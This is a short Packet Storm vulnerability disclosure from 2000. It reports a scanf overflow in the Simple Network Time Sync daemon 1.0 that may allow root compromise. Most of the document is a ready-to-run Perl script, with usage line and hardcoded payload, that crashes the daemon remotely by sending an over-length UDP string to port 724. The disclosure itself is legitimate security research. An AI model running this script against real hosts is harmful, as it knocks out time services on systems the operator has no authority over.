kill_sntsd.pl

2000-06-01T00:00:00
ID PACKETSTORM:22006
Type packetstorm
Reporter Ben Taylor
Modified 2000-06-01T00:00:00

Description

                                        
                                            `I noticed an uncommon scanf overflow in the Simple Network Time Sync daemon   
and client version 1.0, tested on Redhat 6.1. I haven't looked into this   
fully yet, but it looks as tho it could be root comprimising as it sits on a   
priveledged udp port and seems to coredump, but looks like it only gives you   
50 chars to run code with. I have included some perl here which will crash   
it remotely by sending it a string over 50 chars.  
  
---------------------------------------  
  
#!/usr/bin/perl -w  
#  
# Usage: ./kill_sntsd <hostname>  
#  
  
use Socket;  
  
send_packet(); # Needs to send 2 packets to kill the client and the server   
daemons  
send_packet();  
  
sub send_packet {  
  
$proto = getprotobyname('udp');  
$localaddr = gethostbyname("localhost") || die "error: $!\n";  
$iaddr = gethostbyname($ARGV[0]) || die "$!\n";  
$sin = sockaddr_in(724, $iaddr);  
$paddr = sockaddr_in(53, $localaddr);  
socket(SH, PF_INET, SOCK_DGRAM, $proto);  
bind(SH, $paddr);  
  
$|=1;  
  
connect(SH, $sin) || die "$!\n";  
  
# A string longer than 50 characters...  
print SH "logistixlogistixlogistixlogistixlogistixlogistixlogistix\n";  
close(SH);  
  
}  
  
---------------------------------------  
  
logistix  
________________________________________________________________________  
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com  
  
`